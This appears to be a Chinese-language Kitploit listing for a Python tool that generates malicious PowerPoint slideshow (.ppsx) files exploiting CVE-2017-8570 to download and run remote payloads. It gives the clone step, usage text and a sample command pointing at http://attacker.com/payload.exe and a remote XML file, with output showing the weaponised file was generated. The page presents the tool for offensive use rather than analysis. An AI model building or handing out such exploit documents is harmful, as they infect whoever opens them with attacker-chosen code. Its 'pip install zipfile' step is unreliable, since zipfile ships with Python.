Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ppsx-file-generator — 用于cve-2017-8570的ppsx文件生成器(基于bhdresh/cve-2017-8570) | Kitploit
工具/GitHubGitHub/temesgeny/ppsx-file-generator
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubtemesgeny/ppsx-file-generator

ppsx-file-generator

用于cve-2017-8570的ppsx文件生成器(基于bhdresh/cve-2017-8570)

查看仓库
665338年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

介绍

作者:Temesgen Yibeltal [email protected](基于 https://github.com/bhdresh/CVE-2017-8570 的代码,该仓库现已删除)

ppsx-file-generator 是一个 Python 工具,它基于现有文件生成一个能够从远程源执行代码的 PowerPoint 幻灯片文件。

它有什么作用?

该工具根据用户提供的输入生成一个 PowerPoint 幻灯片文件和一个 XML 文件。PowerPoint 文件会访问包含载荷文件信息的 XML 文件。攻击者可以将 XML 文件和载荷部署在本地或公共服务器上,并为每个文件提供一个 URL 作为输入。

获取代码

首先,获取代码:

root@kitploit:~
git clone https://github.com/temesgeny/ppsx-file-generator.git

ppsx-file-generator 使用 Python 编写,需要 zipfile 包,可通过 Pip 安装:

root@kitploit:~
pip install zipfile

需要 Microsoft Office PowerPoint 来执行此任务。

使用方法

首先打开 Microsoft Office PowerPoint 并打开 'template.ppsx'。打开你自己的演示文稿,从 template.ppsx 中将图标 'Coder.exe' 复制到你的 PowerPoint 文件的第 1 张幻灯片中。将文件另存为 PowerPoint 放映(.ppsx)。然后使用 Python 工具:

root@kitploit:~
    Usage: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri

    input_filename          输入的 ppsx 文件名。

    -o              输出的 .ppsx 文件名(包含 .ppsx)。
    -p              载荷 exe 或 sct 文件的 URL。
                    必须位于可访问的 Web 服务器上。(XML 文件可选)
    -x              由 ppsx 文件调用的完整 XML URI。
                    必须位于可访问的 Web 服务器上。(必选)
root@kitploit:~
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully
下载工具